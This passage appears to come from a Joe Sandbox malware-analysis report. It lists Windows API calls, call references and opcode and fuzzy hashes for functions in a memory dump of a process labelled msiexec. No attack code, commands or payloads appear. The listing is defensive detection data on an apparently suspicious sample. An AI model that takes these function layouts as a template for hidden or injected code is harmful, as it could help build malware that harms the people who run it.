                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsicmp
                                                                                                            • String ID: .#v
                                                                                                            • API String ID: 2081463915-507759092
                                                                                                            • Opcode ID: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                                                            • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                            • Opcode Fuzzy Hash: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                                                            • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                            APIs
                                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                            • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2445788494-0
                                                                                                            • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                            • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                            • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                            • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                            • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3150196962-0
                                                                                                            • Opcode ID: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                                            • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                            • Opcode Fuzzy Hash: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                                            • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: malloc
                                                                                                            • String ID: failed to allocate %u bytes of memory
                                                                                                            • API String ID: 2803490479-1168259600
                                                                                                            • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                            • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                            • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                            • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0041BDDF
                                                                                                            • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcmpmemset
                                                                                                            • String ID:
                                                                                                            • API String ID: 1065087418-0
                                                                                                            • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                            • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                            • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                            • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                            • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                              • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                              • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                              • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 1381354015-0
                                                                                                            • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                            • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                            • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                            • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                            APIs
                                                                                                              • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                              • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                              • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                              • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                            • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                            • String ID:
                                                                                                            • API String ID: 2154303073-0
                                                                                                            • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                            • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                            • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                            • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                            APIs
                                                                                                              • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3150196962-0
                                                                                                            • Opcode ID: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                                            • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                            • Opcode Fuzzy Hash: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                                            • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                            APIs
                                                                                                            • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$PointerRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 3154509469-0
                                                                                                            • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                            • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                            • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                            • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                            APIs
                                                                                                            • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                              • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                              • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                              • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                            • String ID:
                                                                                                            • API String ID: 4232544981-0
                                                                                                            • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                            • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                            • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                            • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeLibrary
                                                                                                            • String ID:
                                                                                                            • API String ID: 3664257935-0
                                                                                                            • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                            • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                            • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                            • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                            APIs
                                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                            • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$FileModuleName
                                                                                                            • String ID:
                                                                                                            • API String ID: 3859505661-0
                                                                                                            • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                            • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                            • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                            • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738559852-0
                                                                                                            • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                            • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                            • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                            • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                            APIs
                                                                                                            • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3934441357-0
                                                                                                            • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                            • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                            • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                            • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeLibrary
                                                                                                            • String ID:
                                                                                                            • API String ID: 3664257935-0
                                                                                                            • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                            • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                            • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                            • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                            • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                            • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                            • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                            • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                            • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                            • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                            APIs
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??3@
                                                                                                            • String ID:
                                                                                                            • API String ID: 613200358-0
                                                                                                            • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                            • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                            • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                            • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeLibrary
                                                                                                            • String ID:
                                                                                                            • API String ID: 3664257935-0
                                                                                                            • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                            • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                            • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                            • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                            APIs
                                                                                                            • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnumNamesResource
                                                                                                            • String ID:
                                                                                                            • API String ID: 3334572018-0
                                                                                                            • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                            • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                            • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                            • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeLibrary
                                                                                                            • String ID:
                                                                                                            • API String ID: 3664257935-0
                                                                                                            • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                            • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                            • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                            • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                            APIs
                                                                                                            • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseFind
                                                                                                            • String ID:
                                                                                                            • API String ID: 1863332320-0
                                                                                                            • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                            • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                            • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                            • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                            • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                            • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                            • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
